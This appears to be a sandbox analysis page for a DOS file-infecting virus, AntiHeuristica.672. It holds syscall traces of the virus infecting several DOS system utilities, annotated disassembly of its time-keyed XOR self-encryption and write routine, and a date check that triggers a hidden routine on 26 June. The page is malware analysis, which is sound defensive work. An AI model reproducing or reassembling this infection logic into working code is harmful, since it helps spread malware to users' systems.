Sample viewer

vx.netlux.org/Virus.DOS.AntiHeuristica.672

.


Syscalls:

Time Syscall Op Syscall Name
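2018-12-17T23:05:07.605829387Z 37 PC: 15538 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input') [note: 'Auxiliary input' is the name of DOS function 03h, not of this vector; interrupt 3 is the CPU breakpoint vector, which debuggers rely on]
2018-12-17T23:05:07.608809266Z 37 PC: 1555e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number') [note: 'Set random record number' is the name of DOS function 24h, not of this vector; interrupt 36 (24h) is the DOS critical-error handler, so replacing it can suppress the error prompt when a write fails]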
2018-12-17T23:05:07.611096793Z 78 PC: 15592 | Find first file
2018-12-17T23:05:07.634726304Z 61 PC: 155b4 | Open file (Filename = 'c:\dos\EDIT.COM')
2018-12-17T23:05:07.643894728Z 63 PC: 15736 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:05:07.654942223Z 66 PC: 155c3 | Move file pointer
2018-12-17T23:05:07.656448199Z 62 PC: 155d8 | Close file
2018-12-17T23:05:07.65881584Z 67 PC: 156d7 | Get or set file attributes
2018-12-17T23:05:07.999527571Z 61 PC: 156e5 | Open file (Filename = 'c:\dos\EDIT.COM')
2018-12-17T23:05:08.007701154Z 64 PC: 156f2 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:05:08.011258249Z 66 PC: 15707 | Move file pointer
; Captured after the 'Get time' call (op 44): XOR a 0x13c-word region with a 16-bit key,
; write 0x2a0 (672) bytes through INT 21h, then XOR the same region again.
; Written range is [bp + 0x108, bp + 0x3a8); XORed range is [bp + 0x118, bp + 0x390).
; The key word at [bp + 0x394] is inside the written range but outside the XORed one, so
; each written copy carries its key unmodified at offset 0x28c of the 672 bytes; the first
; 0x10 bytes are written without the XOR pass as well.
; NOTE(review): DX presumably still holds the seconds/hundredths returned by Get time -- confirm.
2018-12-17T23:05:08.014034002Z 44 PC: 157d0 | Get time 0x157d0: mov word ptr [bp + 0x394], dx  ; save DX as the XOR key
0x157d4: lea si, word ptr [bp + 0x118]  ; SI = start of the region to XOR
0x157d8: mov ax, word ptr [bp + 0x394]  ; AX = key
0x157dc: mov cx, 0x13c  ; loop count: 0x13c words = 0x278 bytes
0x157df: xor word ptr [si], ax  ; XOR one word with the key
0x157e1: inc si  ; advance SI by two bytes,
0x157e2: inc si  ; i.e. to the next word
0x157e3: loop 0x157df  ; decrement CX, repeat until it reaches 0
0x157e5: mov ah, 0x40  ; DOS function 40h = op 64 in the trace ('Write file or device')
0x157e7: mov cx, 0x2a0  ; byte count: 0x2a0 = 672
0x157ea: lea dx, word ptr [bp + 0x108]  ; buffer start, 0x10 bytes before the XORed region
0x157ee: int 0x21  ; issue the write; the handle register is not set inside this snippet
0x157f0: lea si, word ptr [bp + 0x118]  ; second pass over the same region
0x157f4: mov ax, word ptr [bp + 0x394]  ; reload the same key
0x157f8: mov cx, 0x13c  ; same word count as the first pass
0x157fb: xor word ptr [si], ax  ; XOR with the same key undoes the first pass
0x157fd: inc si
0x157fe: inc si
0x157ff: loop 0x157fb
0x15801: ret  ; the in-memory region is back to its pre-write contents
2018-12-17T23:05:08.016996471Z 64 PC: 157f0 | Write file or device (Write 672 bytes on handle 5)
2018-12-17T23:05:08.02575462Z 87 PC: 15718 | Get or set file date and time
2018-12-17T23:05:08.030759582Z 62 PC: 1571c | Close file
2018-12-17T23:05:08.041341362Z 67 PC: 1572a | Get or set file attributes
2018-12-17T23:05:08.052676054Z 79 PC: 155ec | Find next file
2018-12-17T23:05:08.057159219Z 61 PC: 155b4 | Open file (Filename = 'c:\dos\FORMAT.COM')
2018-12-17T23:05:08.064901527Z 63 PC: 15736 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:05:08.071533338Z 66 PC: 155c3 | Move file pointer
2018-12-17T23:05:08.07423869Z 62 PC: 155d8 | Close file
2018-12-17T23:05:08.077981181Z 67 PC: 156d7 | Get or set file attributes
2018-12-17T23:05:08.088706604Z 61 PC: 156e5 | Open file (Filename = 'c:\dos\FORMAT.COM')
2018-12-17T23:05:08.096860092Z 64 PC: 156f2 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:05:08.101309443Z 66 PC: 15707 | Move file pointer
; Captured after the 'Get time' call (op 44): XOR a 0x13c-word region with a 16-bit key,
; write 0x2a0 (672) bytes through INT 21h, then XOR the same region again.
; Written range is [bp + 0x108, bp + 0x3a8); XORed range is [bp + 0x118, bp + 0x390).
; The key word at [bp + 0x394] is inside the written range but outside the XORed one, so
; each written copy carries its key unmodified at offset 0x28c of the 672 bytes; the first
; 0x10 bytes are written without the XOR pass as well.
; NOTE(review): DX presumably still holds the seconds/hundredths returned by Get time -- confirm.
2018-12-17T23:05:08.102879244Z 44 PC: 157d0 | Get time 0x157d0: mov word ptr [bp + 0x394], dx  ; save DX as the XOR key
0x157d4: lea si, word ptr [bp + 0x118]  ; SI = start of the region to XOR
0x157d8: mov ax, word ptr [bp + 0x394]  ; AX = key
0x157dc: mov cx, 0x13c  ; loop count: 0x13c words = 0x278 bytes
0x157df: xor word ptr [si], ax  ; XOR one word with the key
0x157e1: inc si  ; advance SI by two bytes,
0x157e2: inc si  ; i.e. to the next word
0x157e3: loop 0x157df  ; decrement CX, repeat until it reaches 0
0x157e5: mov ah, 0x40  ; DOS function 40h = op 64 in the trace ('Write file or device')
0x157e7: mov cx, 0x2a0  ; byte count: 0x2a0 = 672
0x157ea: lea dx, word ptr [bp + 0x108]  ; buffer start, 0x10 bytes before the XORed region
0x157ee: int 0x21  ; issue the write; the handle register is not set inside this snippet
0x157f0: lea si, word ptr [bp + 0x118]  ; second pass over the same region
0x157f4: mov ax, word ptr [bp + 0x394]  ; reload the same key
0x157f8: mov cx, 0x13c  ; same word count as the first pass
0x157fb: xor word ptr [si], ax  ; XOR with the same key undoes the first pass
0x157fd: inc si
0x157fe: inc si
0x157ff: loop 0x157fb
0x15801: ret  ; the in-memory region is back to its pre-write contents
2018-12-17T23:05:08.105344763Z 64 PC: 157f0 | Write file or device (Write 672 bytes on handle 5)
2018-12-17T23:05:08.114316473Z 87 PC: 15718 | Get or set file date and time
2018-12-17T23:05:08.116127326Z 62 PC: 1571c | Close file
2018-12-17T23:05:08.123378408Z 67 PC: 1572a | Get or set file attributes
2018-12-17T23:05:08.135184933Z 79 PC: 155ec | Find next file
2018-12-17T23:05:08.138940491Z 61 PC: 155b4 | Open file (Filename = 'c:\dos\KEYB.COM')
2018-12-17T23:05:08.147026144Z 63 PC: 15736 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:05:08.154170993Z 66 PC: 155c3 | Move file pointer
2018-12-17T23:05:08.156562647Z 62 PC: 155d8 | Close file
2018-12-17T23:05:08.158968555Z 67 PC: 156d7 | Get or set file attributes
2018-12-17T23:05:08.171662449Z 61 PC: 156e5 | Open file (Filename = 'c:\dos\KEYB.COM')
2018-12-17T23:05:08.179770332Z 64 PC: 156f2 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:05:08.183335771Z 66 PC: 15707 | Move file pointer
; Captured after the 'Get time' call (op 44): XOR a 0x13c-word region with a 16-bit key,
; write 0x2a0 (672) bytes through INT 21h, then XOR the same region again.
; Written range is [bp + 0x108, bp + 0x3a8); XORed range is [bp + 0x118, bp + 0x390).
; The key word at [bp + 0x394] is inside the written range but outside the XORed one, so
; each written copy carries its key unmodified at offset 0x28c of the 672 bytes; the first
; 0x10 bytes are written without the XOR pass as well.
; NOTE(review): DX presumably still holds the seconds/hundredths returned by Get time -- confirm.
2018-12-17T23:05:08.18606579Z 44 PC: 157d0 | Get time 0x157d0: mov word ptr [bp + 0x394], dx  ; save DX as the XOR key
0x157d4: lea si, word ptr [bp + 0x118]  ; SI = start of the region to XOR
0x157d8: mov ax, word ptr [bp + 0x394]  ; AX = key
0x157dc: mov cx, 0x13c  ; loop count: 0x13c words = 0x278 bytes
0x157df: xor word ptr [si], ax  ; XOR one word with the key
0x157e1: inc si  ; advance SI by two bytes,
0x157e2: inc si  ; i.e. to the next word
0x157e3: loop 0x157df  ; decrement CX, repeat until it reaches 0
0x157e5: mov ah, 0x40  ; DOS function 40h = op 64 in the trace ('Write file or device')
0x157e7: mov cx, 0x2a0  ; byte count: 0x2a0 = 672
0x157ea: lea dx, word ptr [bp + 0x108]  ; buffer start, 0x10 bytes before the XORed region
0x157ee: int 0x21  ; issue the write; the handle register is not set inside this snippet
0x157f0: lea si, word ptr [bp + 0x118]  ; second pass over the same region
0x157f4: mov ax, word ptr [bp + 0x394]  ; reload the same key
0x157f8: mov cx, 0x13c  ; same word count as the first pass
0x157fb: xor word ptr [si], ax  ; XOR with the same key undoes the first pass
0x157fd: inc si
0x157fe: inc si
0x157ff: loop 0x157fb
0x15801: ret  ; the in-memory region is back to its pre-write contents
2018-12-17T23:05:08.189164832Z 64 PC: 157f0 | Write file or device (Write 672 bytes on handle 5)
2018-12-17T23:05:08.200491508Z 87 PC: 15718 | Get or set file date and time
2018-12-17T23:05:08.202350088Z 62 PC: 1571c | Close file
2018-12-17T23:05:08.211063159Z 67 PC: 1572a | Get or set file attributes
2018-12-17T23:05:08.222765976Z 79 PC: 155ec | Find next file
2018-12-17T23:05:08.231425919Z 61 PC: 155b4 | Open file (Filename = 'c:\dos\SYS.COM')
2018-12-17T23:05:08.240159421Z 63 PC: 15736 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:05:08.247019598Z 66 PC: 155c3 | Move file pointer
2018-12-17T23:05:08.248794756Z 62 PC: 155d8 | Close file
2018-12-17T23:05:08.251821501Z 67 PC: 156d7 | Get or set file attributes
2018-12-17T23:05:08.263524861Z 61 PC: 156e5 | Open file (Filename = 'c:\dos\SYS.COM')
2018-12-17T23:05:08.271514759Z 64 PC: 156f2 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:05:08.275969067Z 66 PC: 15707 | Move file pointer
; Captured after the 'Get time' call (op 44): XOR a 0x13c-word region with a 16-bit key,
; write 0x2a0 (672) bytes through INT 21h, then XOR the same region again.
; Written range is [bp + 0x108, bp + 0x3a8); XORed range is [bp + 0x118, bp + 0x390).
; The key word at [bp + 0x394] is inside the written range but outside the XORed one, so
; each written copy carries its key unmodified at offset 0x28c of the 672 bytes; the first
; 0x10 bytes are written without the XOR pass as well.
; NOTE(review): DX presumably still holds the seconds/hundredths returned by Get time -- confirm.
2018-12-17T23:05:08.278620895Z 44 PC: 157d0 | Get time 0x157d0: mov word ptr [bp + 0x394], dx  ; save DX as the XOR key
0x157d4: lea si, word ptr [bp + 0x118]  ; SI = start of the region to XOR
0x157d8: mov ax, word ptr [bp + 0x394]  ; AX = key
0x157dc: mov cx, 0x13c  ; loop count: 0x13c words = 0x278 bytes
0x157df: xor word ptr [si], ax  ; XOR one word with the key
0x157e1: inc si  ; advance SI by two bytes,
0x157e2: inc si  ; i.e. to the next word
0x157e3: loop 0x157df  ; decrement CX, repeat until it reaches 0
0x157e5: mov ah, 0x40  ; DOS function 40h = op 64 in the trace ('Write file or device')
0x157e7: mov cx, 0x2a0  ; byte count: 0x2a0 = 672
0x157ea: lea dx, word ptr [bp + 0x108]  ; buffer start, 0x10 bytes before the XORed region
0x157ee: int 0x21  ; issue the write; the handle register is not set inside this snippet
0x157f0: lea si, word ptr [bp + 0x118]  ; second pass over the same region
0x157f4: mov ax, word ptr [bp + 0x394]  ; reload the same key
0x157f8: mov cx, 0x13c  ; same word count as the first pass
0x157fb: xor word ptr [si], ax  ; XOR with the same key undoes the first pass
0x157fd: inc si
0x157fe: inc si
0x157ff: loop 0x157fb
0x15801: ret  ; the in-memory region is back to its pre-write contents
2018-12-17T23:05:08.28161776Z 64 PC: 157f0 | Write file or device (Write 672 bytes on handle 5)
2018-12-17T23:05:08.290992697Z 87 PC: 15718 | Get or set file date and time
2018-12-17T23:05:08.293579686Z 62 PC: 1571c | Close file
2018-12-17T23:05:08.302493555Z 67 PC: 1572a | Get or set file attributes
2018-12-17T23:05:08.31450483Z 79 PC: 155ec | Find next file
; Captured after the 'Get date' call (op 42): compare the date against fixed constants and
; either call 0x15754 and terminate, or clear the registers and return to offset 0x100.
; NOTE(review): assumes DH = month and DL = day as returned by DOS Get date, which makes
; the constants 6 and 0x1a mean 26 June -- confirm against the DOS call reference.
2018-12-17T23:05:08.322833321Z 42 PC: 15671 | Get date 0x15671: cmp dh, 6  ; DH == 6 ?
0x15674: jne 0x15682  ; no: take the normal exit path
0x15676: cmp dl, 0x1a  ; DL == 0x1a (26) ?
0x15679: jne 0x15682  ; no: take the normal exit path
0x1567b: call 0x15754  ; both matched: routine at 0x15754 is not shown on this page
0x1567e: mov ah, 0x4c  ; DOS function 4Ch = op 76 in the trace ('Terminate with return code')
0x15680: int 0x21  ; AL (the return code) is not set inside this snippet
0x15682: mov ax, 0x100  ; normal path: 0x100 is the offset a .COM image starts at
0x15685: push ax  ; push it so the near ret below transfers there
0x15686: xor ax, ax  ; clear the general registers before leaving
0x15688: xor bx, bx
0x1568a: xor cx, cx
0x1568c: xor dx, dx
0x1568e: xor di, di
0x15690: xor si, si
0x15692: xor bp, bp
0x15694: ret  ; pops 0x100 into IP; presumably hands control to the host program
; NOTE(review): the three lines below follow an unconditional ret and are probably data
; decoded as code; with the usual near/short encodings their operand bytes would be
; 56 69 / 75 / 20 after opcodes E9, 72, 73, i.e. the ASCII text "Virus " -- verify on the raw bytes.
0x15695: jmp 0x1bfee
0x15698: jb 0x1570f
0x1569a: jae 0x156bc
2018-12-17T23:05:08.326510528Z 99 PC: 143ba | Get DBCS lead byte table pointer
2018-12-17T23:05:08.330366178Z 68 PC: 143d4 | I/O control for devices (Set for = '')
2018-12-17T23:05:08.333451231Z 68 PC: 143df | I/O control for devices (Set for = '')
2018-12-17T23:05:08.336163098Z 68 PC: 143ea | I/O control for devices (Set for = '')
2018-12-17T23:05:08.338092225Z 68 PC: 143f2 | I/O control for devices (Set for = '��b���g�t�S3����[r�2��W�<t�<u�6�u����>��>W')
2018-12-17T23:05:08.341356017Z 48 PC: 143f7 | Get DOS version
2018-12-17T23:05:08.343335163Z 64 PC: 14535 | Write file or device (Write 27 bytes on handle 2)
2018-12-17T23:05:08.352934829Z 76 PC: 131dd | Terminate with return code (Return code = '4')

{"DateBased":true,"Day":26,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":15109,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
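2018-12-25T12:42:39.067310666Z 37 PC: 15538 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input') [note: 'Auxiliary input' is the name of DOS function 03h, not of this vector; interrupt 3 is the CPU breakpoint vector, which debuggers rely on]
2018-12-25T12:42:39.069657592Z 37 PC: 1555e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number') [note: 'Set random record number' is the name of DOS function 24h, not of this vector; interrupt 36 (24h) is the DOS critical-error handler, so replacing it can suppress the error prompt when a write fails]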
2018-12-25T12:42:39.072733457Z 78 PC: 15592 | Find first file
2018-12-25T12:42:39.083202692Z 61 PC: 155b4 | Open file (Filename = 'c:\dos\EDIT.COM')
2018-12-25T12:42:39.090944758Z 63 PC: 15736 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:42:39.098111881Z 66 PC: 155c3 | Move file pointer
2018-12-25T12:42:39.099776104Z 62 PC: 155d8 | Close file
2018-12-25T12:42:39.102519562Z 67 PC: 156d7 | Get or set file attributes
2018-12-25T12:42:39.789998415Z 61 PC: 156e5 | Open file (Filename = 'c:\dos\EDIT.COM')
2018-12-25T12:42:39.801166559Z 64 PC: 156f2 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:42:39.805233021Z 66 PC: 15707 | Move file pointer
; Captured after the 'Get time' call (op 44): XOR a 0x13c-word region with a 16-bit key,
; write 0x2a0 (672) bytes through INT 21h, then XOR the same region again.
; Written range is [bp + 0x108, bp + 0x3a8); XORed range is [bp + 0x118, bp + 0x390).
; The key word at [bp + 0x394] is inside the written range but outside the XORed one, so
; each written copy carries its key unmodified at offset 0x28c of the 672 bytes; the first
; 0x10 bytes are written without the XOR pass as well.
; NOTE(review): DX presumably still holds the seconds/hundredths returned by Get time -- confirm.
2018-12-25T12:42:39.808282588Z 44 PC: 157d0 | Get time 0x157d0: mov word ptr [bp + 0x394], dx  ; save DX as the XOR key
0x157d4: lea si, word ptr [bp + 0x118]  ; SI = start of the region to XOR
0x157d8: mov ax, word ptr [bp + 0x394]  ; AX = key
0x157dc: mov cx, 0x13c  ; loop count: 0x13c words = 0x278 bytes
0x157df: xor word ptr [si], ax  ; XOR one word with the key
0x157e1: inc si  ; advance SI by two bytes,
0x157e2: inc si  ; i.e. to the next word
0x157e3: loop 0x157df  ; decrement CX, repeat until it reaches 0
0x157e5: mov ah, 0x40  ; DOS function 40h = op 64 in the trace ('Write file or device')
0x157e7: mov cx, 0x2a0  ; byte count: 0x2a0 = 672
0x157ea: lea dx, word ptr [bp + 0x108]  ; buffer start, 0x10 bytes before the XORed region
0x157ee: int 0x21  ; issue the write; the handle register is not set inside this snippet
0x157f0: lea si, word ptr [bp + 0x118]  ; second pass over the same region
0x157f4: mov ax, word ptr [bp + 0x394]  ; reload the same key
0x157f8: mov cx, 0x13c  ; same word count as the first pass
0x157fb: xor word ptr [si], ax  ; XOR with the same key undoes the first pass
0x157fd: inc si
0x157fe: inc si
0x157ff: loop 0x157fb
0x15801: ret  ; the in-memory region is back to its pre-write contents
2018-12-25T12:42:39.811557484Z 64 PC: 157f0 | Write file or device (Write 672 bytes on handle 5)
2018-12-25T12:42:39.820646871Z 87 PC: 15718 | Get or set file date and time
2018-12-25T12:42:39.823764416Z 62 PC: 1571c | Close file
2018-12-25T12:42:39.832034526Z 67 PC: 1572a | Get or set file attributes
2018-12-25T12:42:39.843668962Z 79 PC: 155ec | Find next file
2018-12-25T12:42:39.847506521Z 61 PC: 155b4 | Open file (See above)
2018-12-25T12:42:39.857842359Z 63 PC: 15736 | Read file or device (See above)
2018-12-25T12:42:39.86515071Z 66 PC: 155c3 | Move file pointer (See above)
2018-12-25T12:42:39.867392214Z 62 PC: 155d8 | Close file (See above)
2018-12-25T12:42:39.871262072Z 67 PC: 156d7 | Get or set file attributes (See above)
2018-12-25T12:42:39.882195587Z 61 PC: 156e5 | Open file (See above)
2018-12-25T12:42:39.890156005Z 64 PC: 156f2 | Write file or device (See above)
2018-12-25T12:42:39.894917582Z 66 PC: 15707 | Move file pointer (See above)
2018-12-25T12:42:39.897101043Z 44 PC: 157d0 | Get time (See above)
2018-12-25T12:42:39.90030288Z 64 PC: 157f0 | Write file or device (See above)
2018-12-25T12:42:39.910291378Z 87 PC: 15718 | Get or set file date and time (See above)
2018-12-25T12:42:39.921517532Z 62 PC: 1571c | Close file (See above)
2018-12-25T12:42:39.930027578Z 67 PC: 1572a | Get or set file attributes (See above)
2018-12-25T12:42:39.943925435Z 79 PC: 155ec | Find next file (See above)
2018-12-25T12:42:39.948619991Z 61 PC: 155b4 | Open file (See above)
2018-12-25T12:42:39.956838178Z 63 PC: 15736 | Read file or device (See above)
2018-12-25T12:42:39.963275267Z 66 PC: 155c3 | Move file pointer (See above)
2018-12-25T12:42:39.966501814Z 62 PC: 155d8 | Close file (See above)
2018-12-25T12:42:39.969016009Z 67 PC: 156d7 | Get or set file attributes (See above)
2018-12-25T12:42:39.986283468Z 61 PC: 156e5 | Open file (See above)
2018-12-25T12:42:39.995112451Z 64 PC: 156f2 | Write file or device (See above)
2018-12-25T12:42:39.998551231Z 66 PC: 15707 | Move file pointer (See above)
2018-12-25T12:42:40.000555069Z 44 PC: 157d0 | Get time (See above)
2018-12-25T12:42:40.00518925Z 64 PC: 157f0 | Write file or device (See above)
2018-12-25T12:42:40.020535347Z 87 PC: 15718 | Get or set file date and time (See above)
2018-12-25T12:42:40.022631227Z 62 PC: 1571c | Close file (See above)
2018-12-25T12:42:40.09972843Z 67 PC: 1572a | Get or set file attributes (See above)
2018-12-25T12:42:40.135524208Z 79 PC: 155ec | Find next file (See above)
2018-12-25T12:42:40.143432437Z 61 PC: 155b4 | Open file (See above)
2018-12-25T12:42:40.152945406Z 63 PC: 15736 | Read file or device (See above)
2018-12-25T12:42:40.160517714Z 66 PC: 155c3 | Move file pointer (See above)
2018-12-25T12:42:40.162501927Z 62 PC: 155d8 | Close file (See above)
2018-12-25T12:42:40.165666058Z 67 PC: 156d7 | Get or set file attributes (See above)
2018-12-25T12:42:40.184173252Z 61 PC: 156e5 | Open file (See above)
2018-12-25T12:42:40.193155304Z 64 PC: 156f2 | Write file or device (See above)
2018-12-25T12:42:40.196332223Z 66 PC: 15707 | Move file pointer (See above)
2018-12-25T12:42:40.198960256Z 44 PC: 157d0 | Get time (See above)
2018-12-25T12:42:40.201863481Z 64 PC: 157f0 | Write file or device (See above)
2018-12-25T12:42:40.263164165Z 87 PC: 15718 | Get or set file date and time (See above)
2018-12-25T12:42:40.266410733Z 62 PC: 1571c | Close file (See above)
2018-12-25T12:42:40.283905336Z 67 PC: 1572a | Get or set file attributes (See above)
2018-12-25T12:42:40.298263745Z 79 PC: 155ec | Find next file (See above)
; Captured after the 'Get date' call (op 42): compare the date against fixed constants and
; either call 0x15754 and terminate, or clear the registers and return to offset 0x100.
; NOTE(review): assumes DH = month and DL = day as returned by DOS Get date, which makes
; the constants 6 and 0x1a mean 26 June -- confirm against the DOS call reference.
2018-12-25T12:42:40.306680383Z 42 PC: 15671 | Get date 0x15671: cmp dh, 6  ; DH == 6 ?
0x15674: jne 0x15682  ; no: take the normal exit path
0x15676: cmp dl, 0x1a  ; DL == 0x1a (26) ?
0x15679: jne 0x15682  ; no: take the normal exit path
0x1567b: call 0x15754  ; both matched: routine at 0x15754 is not shown on this page
0x1567e: mov ah, 0x4c  ; DOS function 4Ch = op 76 in the trace ('Terminate with return code')
0x15680: int 0x21  ; AL (the return code) is not set inside this snippet
0x15682: mov ax, 0x100  ; normal path: 0x100 is the offset a .COM image starts at
0x15685: push ax  ; push it so the near ret below transfers there
0x15686: xor ax, ax  ; clear the general registers before leaving
0x15688: xor bx, bx
0x1568a: xor cx, cx
0x1568c: xor dx, dx
0x1568e: xor di, di
0x15690: xor si, si
0x15692: xor bp, bp
0x15694: ret  ; pops 0x100 into IP; presumably hands control to the host program
; NOTE(review): the three lines below follow an unconditional ret and are probably data
; decoded as code; with the usual near/short encodings their operand bytes would be
; 56 69 / 75 / 20 after opcodes E9, 72, 73, i.e. the ASCII text "Virus " -- verify on the raw bytes.
0x15695: jmp 0x1bfee
0x15698: jb 0x1570f
0x1569a: jae 0x156bc
2018-12-25T12:42:40.311795426Z 76 PC: 15682 | Terminate with return code (Return code = '32')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":15109,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
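2018-12-25T12:42:39.215182703Z 37 PC: 15538 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input') [note: 'Auxiliary input' is the name of DOS function 03h, not of this vector; interrupt 3 is the CPU breakpoint vector, which debuggers rely on]
2018-12-25T12:42:39.217661901Z 37 PC: 1555e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number') [note: 'Set random record number' is the name of DOS function 24h, not of this vector; interrupt 36 (24h) is the DOS critical-error handler, so replacing it can suppress the error prompt when a write fails]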
2018-12-25T12:42:39.219121897Z 78 PC: 15592 | Find first file
2018-12-25T12:42:39.229091331Z 61 PC: 155b4 | Open file (Filename = 'c:\dos\EDIT.COM')
2018-12-25T12:42:39.237236146Z 63 PC: 15736 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:42:39.243377709Z 66 PC: 155c3 | Move file pointer
2018-12-25T12:42:39.246142661Z 62 PC: 155d8 | Close file
2018-12-25T12:42:39.249001224Z 67 PC: 156d7 | Get or set file attributes
2018-12-25T12:42:39.788927166Z 61 PC: 156e5 | Open file (Filename = 'c:\dos\EDIT.COM')
2018-12-25T12:42:39.798126518Z 64 PC: 156f2 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:42:39.802088997Z 66 PC: 15707 | Move file pointer
; Captured after the 'Get time' call (op 44): XOR a 0x13c-word region with a 16-bit key,
; write 0x2a0 (672) bytes through INT 21h, then XOR the same region again.
; Written range is [bp + 0x108, bp + 0x3a8); XORed range is [bp + 0x118, bp + 0x390).
; The key word at [bp + 0x394] is inside the written range but outside the XORed one, so
; each written copy carries its key unmodified at offset 0x28c of the 672 bytes; the first
; 0x10 bytes are written without the XOR pass as well.
; NOTE(review): DX presumably still holds the seconds/hundredths returned by Get time -- confirm.
2018-12-25T12:42:39.804282979Z 44 PC: 157d0 | Get time 0x157d0: mov word ptr [bp + 0x394], dx  ; save DX as the XOR key
0x157d4: lea si, word ptr [bp + 0x118]  ; SI = start of the region to XOR
0x157d8: mov ax, word ptr [bp + 0x394]  ; AX = key
0x157dc: mov cx, 0x13c  ; loop count: 0x13c words = 0x278 bytes
0x157df: xor word ptr [si], ax  ; XOR one word with the key
0x157e1: inc si  ; advance SI by two bytes,
0x157e2: inc si  ; i.e. to the next word
0x157e3: loop 0x157df  ; decrement CX, repeat until it reaches 0
0x157e5: mov ah, 0x40  ; DOS function 40h = op 64 in the trace ('Write file or device')
0x157e7: mov cx, 0x2a0  ; byte count: 0x2a0 = 672
0x157ea: lea dx, word ptr [bp + 0x108]  ; buffer start, 0x10 bytes before the XORed region
0x157ee: int 0x21  ; issue the write; the handle register is not set inside this snippet
0x157f0: lea si, word ptr [bp + 0x118]  ; second pass over the same region
0x157f4: mov ax, word ptr [bp + 0x394]  ; reload the same key
0x157f8: mov cx, 0x13c  ; same word count as the first pass
0x157fb: xor word ptr [si], ax  ; XOR with the same key undoes the first pass
0x157fd: inc si
0x157fe: inc si
0x157ff: loop 0x157fb
0x15801: ret  ; the in-memory region is back to its pre-write contents
2018-12-25T12:42:39.806908444Z 64 PC: 157f0 | Write file or device (Write 672 bytes on handle 5)
2018-12-25T12:42:39.815733058Z 87 PC: 15718 | Get or set file date and time
2018-12-25T12:42:39.818201056Z 62 PC: 1571c | Close file
2018-12-25T12:42:39.839421994Z 67 PC: 1572a | Get or set file attributes
2018-12-25T12:42:39.85201704Z 79 PC: 155ec | Find next file
2018-12-25T12:42:39.857013347Z 61 PC: 155b4 | Open file (See above)
2018-12-25T12:42:39.865570476Z 63 PC: 15736 | Read file or device (See above)
2018-12-25T12:42:39.872312754Z 66 PC: 155c3 | Move file pointer (See above)
2018-12-25T12:42:39.875470959Z 62 PC: 155d8 | Close file (See above)
2018-12-25T12:42:39.87833915Z 67 PC: 156d7 | Get or set file attributes (See above)
2018-12-25T12:42:39.89025226Z 61 PC: 156e5 | Open file (See above)
2018-12-25T12:42:39.899557754Z 64 PC: 156f2 | Write file or device (See above)
2018-12-25T12:42:39.903588245Z 66 PC: 15707 | Move file pointer (See above)
2018-12-25T12:42:39.906525693Z 44 PC: 157d0 | Get time (See above)
2018-12-25T12:42:39.909944098Z 64 PC: 157f0 | Write file or device (See above)
2018-12-25T12:42:39.919549852Z 87 PC: 15718 | Get or set file date and time (See above)
2018-12-25T12:42:39.921355116Z 62 PC: 1571c | Close file (See above)
2018-12-25T12:42:39.929395932Z 67 PC: 1572a | Get or set file attributes (See above)
2018-12-25T12:42:39.949437234Z 79 PC: 155ec | Find next file (See above)
2018-12-25T12:42:39.952848057Z 61 PC: 155b4 | Open file (See above)
2018-12-25T12:42:39.960592868Z 63 PC: 15736 | Read file or device (See above)
2018-12-25T12:42:39.968446337Z 66 PC: 155c3 | Move file pointer (See above)
2018-12-25T12:42:39.970465513Z 62 PC: 155d8 | Close file (See above)
2018-12-25T12:42:39.97288442Z 67 PC: 156d7 | Get or set file attributes (See above)
2018-12-25T12:42:39.990454552Z 61 PC: 156e5 | Open file (See above)
2018-12-25T12:42:39.999373972Z 64 PC: 156f2 | Write file or device (See above)
2018-12-25T12:42:40.003035555Z 66 PC: 15707 | Move file pointer (See above)
2018-12-25T12:42:40.00557639Z 44 PC: 157d0 | Get time (See above)
2018-12-25T12:42:40.010381899Z 64 PC: 157f0 | Write file or device (See above)
2018-12-25T12:42:40.020687301Z 87 PC: 15718 | Get or set file date and time (See above)
2018-12-25T12:42:40.022726009Z 62 PC: 1571c | Close file (See above)
2018-12-25T12:42:40.050225738Z 67 PC: 1572a | Get or set file attributes (See above)
2018-12-25T12:42:40.098487233Z 79 PC: 155ec | Find next file (See above)
2018-12-25T12:42:40.107707969Z 61 PC: 155b4 | Open file (See above)
2018-12-25T12:42:40.116729599Z 63 PC: 15736 | Read file or device (See above)
2018-12-25T12:42:40.123147836Z 66 PC: 155c3 | Move file pointer (See above)
2018-12-25T12:42:40.124808526Z 62 PC: 155d8 | Close file (See above)
2018-12-25T12:42:40.128121437Z 67 PC: 156d7 | Get or set file attributes (See above)
2018-12-25T12:42:40.151658771Z 61 PC: 156e5 | Open file (See above)
2018-12-25T12:42:40.160418968Z 64 PC: 156f2 | Write file or device (See above)
2018-12-25T12:42:40.165038838Z 66 PC: 15707 | Move file pointer (See above)
2018-12-25T12:42:40.167082164Z 44 PC: 157d0 | Get time (See above)
2018-12-25T12:42:40.170237028Z 64 PC: 157f0 | Write file or device (See above)
2018-12-25T12:42:40.190192095Z 87 PC: 15718 | Get or set file date and time (See above)
2018-12-25T12:42:40.192711491Z 62 PC: 1571c | Close file (See above)
2018-12-25T12:42:40.254932912Z 67 PC: 1572a | Get or set file attributes (See above)
2018-12-25T12:42:40.284505291Z 79 PC: 155ec | Find next file (See above)
; Captured after the 'Get date' call (op 42): compare the date against fixed constants and
; either call 0x15754 and terminate, or clear the registers and return to offset 0x100.
